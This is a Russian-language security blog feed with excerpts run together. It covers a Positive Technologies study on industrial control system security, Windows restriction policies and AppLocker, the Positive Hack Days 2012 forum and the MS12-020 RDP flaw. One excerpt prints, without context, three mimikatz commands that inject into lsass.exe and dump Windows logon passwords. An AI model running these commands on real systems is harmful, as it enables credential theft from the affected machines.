Желаю всем в новом году тока положительной динамики во всех плоскостях!
С наступающим новым годом и рождеством!11
ЗЫ. Продуктивных праздничных дней ;))
С наступающим новым годом и рождеством!11
ЗЫ. Продуктивных праздничных дней ;))
Когда наступит конец света? Совсем скоро! И в самом что ни на есть прямом смысле этого слова (и не по календарю майя), если ситуация с безопасностью АСУ ТП не измениться кардинальным образом. Такое безрадостное утверждение основано на результатах проведенного исследования компанией Positive Technologies, посвященное реальной безопасности АСУ ТП сегодня.Политики ограниченного использования программ являются функциональной возможностью операционных систем Microsoft® Windows®. Эта важная функция предоставляет администраторам основанный на управлении групповыми политиками механизм идентификации программ, выполняющихся на компьютере, и контролирует возможность их выполнения. Политики ограниченного использования программ могут существенно повысить целостность и управляемость системы, что в конечном счете снижает стоимость владения компьютером. Подробнее: http://technet.microsoft.com/ru-RU/library/hh831534 AppLocker – продолжение развития SPR, подробнее: http://technet.microsoft.com/ru-ru/library/dd548340(v=ws.10).aspx
Видимо я несколько запоздал с написанием отзыва о форуме… С другой стороны написать пару строк за PHDays очень даже хочется :) Буду краток, МЫ ЭТО СДЕЛАЛИ! Э-ГЕ-ГЕЙ!11До международного форума по практической безопасности Positive Hack Days 2012 (#phdays) осталось менее двух месяцев. Программа в целом сформирована и она апупенна! Направления тематических конкурсов до, после и во время мероприятия (включая мега CTF 2012) проработаны и в настоящее время идет их активная разработка. На следующей неделе планируется запуск нового сайта форума. Следите за новостями.
З.Ы. И да, это мой первый пост с андроида. "Все, когда-то бывает в первый раз" (с)
Как обычно во второй вторник месяца компания Microsoft выпустила пачку заплаток к линейке своих продуктов. Из всего списка бюллетеней по безопасности одной уязвимости, а это - MS12-020, был присвоен статус критической баги. "Обновление устраняет две обнаруженные уязвимости в протоколе удаленного рабочего стола (RDP). Наиболее серьезная из этих уязвимостей делает возможным удаленное выполнение кода, если злоумышленник отправляет уязвимой системе последовательность специально созданных пакетов RDP", сообщается на соответствующей странице.mimikatz # privilege::debug
mimikatz # inject::process lsass.exe sekurlsa.dll
mimikatz # @getLogonPasswords
Опубликовано расписание образовательной программы "Практическая безопасность" на первое полугодие 2012 года. Стоит отметить, что запланированный список тем не является окончательным и со временем будет пополняться. Разумеется, все самые "вкусные" темы припасены на международный форум Positive Hack Days :)